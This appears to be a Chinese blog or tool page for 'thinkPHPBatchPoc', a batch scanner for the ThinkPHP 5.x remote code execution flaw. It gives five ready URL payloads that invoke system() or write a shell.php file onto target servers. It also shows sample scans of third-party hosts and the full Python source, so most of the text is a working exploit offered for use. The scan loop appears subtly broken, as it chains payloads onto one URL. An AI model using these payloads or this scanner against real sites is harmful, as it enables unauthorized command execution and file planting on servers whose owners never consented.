目录导航
thinkphp远程代码执行漏洞批量检测工具
thinkPHPBatchPoc
ThinkPHP 5.0远程代码执行漏洞 getshell
thinkPHPBatchPoc 是一款thinkPHP远程代码执行漏洞批量检测工具
工具所使用的payload
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
?s=index/\think\Request/input&filter=system&data=echo%20www_admintony_com
?s=index/\think\view\driver\Php/display&content=%3C?php%20echo%20www_admintony_com;?%3E
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20echo%20"www_admintony_com";?%3E
工具使用方法
PS E:\PyProject> python .\thinkPHPBatchPoc.py
thinkPHPBatchPoc
脚本仅用于批量检测站点是否存在漏洞,请勿用于非法用途,否则作者不担负任何责任。
usage:
thinkPHPBatchPoc.py -f target.txt # 批量检测是否存在thinkPHP代码执行漏洞
thinkPHPBatchPoc.py -u target_URL # 指定检测是否存在thinkPHP代码执行漏洞
针对单个目标进行测试
PS E:\PyProject> python .\thinkPHPBatchPoc.py -u admintony.com
[+] http://admintony.com is vulnerable
[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
批量测试
PS E:\PyProject> python .\thinkPHPBatchPoc.py -f .\target.txt
[+]Testing http://www.admintony.com
[-] http://www.admintony.com is not vulnerable
[+]Testing http://baidu.com
[-] http://baidu.com is not vulnerable
[+]Testing vulW3b.admintony.com/
[+] http://vulW3b.admintony.com/ is vulnerable
[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com
工具代码: thinkPHPBatchPoc.py
#coding:utf-8
import requests,sys
payload = {
0:r"?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com",
1:r"?s=index/\think\Request/input&filter=system&data=echo%20www_admintony_com",
2:r"?s=index/\think\view\driver\Php/display&content=%3C?php%20echo%20www_admintony_com;?%3E",
3:r"?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com",
4:r"?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20echo%20\"www_admintony_com\";?%3E"
}
headers={'user-agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36',
'referer':'http://baidu.com'}
def Requests(url):
res = requests.get(url,headers=headers)
if 'www_admintony_com' in res.text:
return True
else:
return False
def Requests_write(url,URL):
# 写shell
requests.get(url,headers=headers)
# 验证是否写入成功
res1 = requests.get(URL+'/shell.php')
if 'www_admintony_com' in res1.text:
return True
else:
return False
def Scan(url):
URL = url
if ('http://' in url) or ('https://' in url):
pass
else:
url = 'http://'+url
URL = url
if 'index.php' not in url:
url = url+'/index.php'
i = 0
flag =False
while i<5:
url = url+payload.get(i)
#print(payload.get(i))
if not flag:
if i<4:
flag = Requests(url)
elif i==4:
flag = Requests_write(url,URL)
i = i+1
else:
break
if i==5:
print("[-] {} is not vulnerable".format(URL))
print()
else:
print("[+] {} is vulnerable\n[+] Payload is {}".format(URL,payload.get(i-1)))
print()
def Batch(file):
with open(file,'r+') as f:
targets = f.readlines()
#print(targets)
for t in targets:
try:
t = t.split('\n')[0]
except:
pass
print('[+]Testing '+t)
Scan(t)
def banner():
print("""thinkPHPBatchPoc
脚本仅用于批量检测站点是否存在漏洞,请勿用于非法用途
usage:
thinkPHPBatchPoc.py -f target.txt # 批量检测是否存在thinkPHP代码执行漏洞
thinkPHPBatchPoc.py -u target_URL # 指定检测是否存在thinkPHP代码执行漏洞
""")
if __name__ == '__main__':
"""
usage : POC.py -f target.txt
POC.py -u target_url
"""
if len(sys.argv)!=3:
banner()
exit()
if sys.argv[1]=='-f':
Batch(sys.argv[2])
elif sys.argv[1]=='-u':
Scan(sys.argv[2])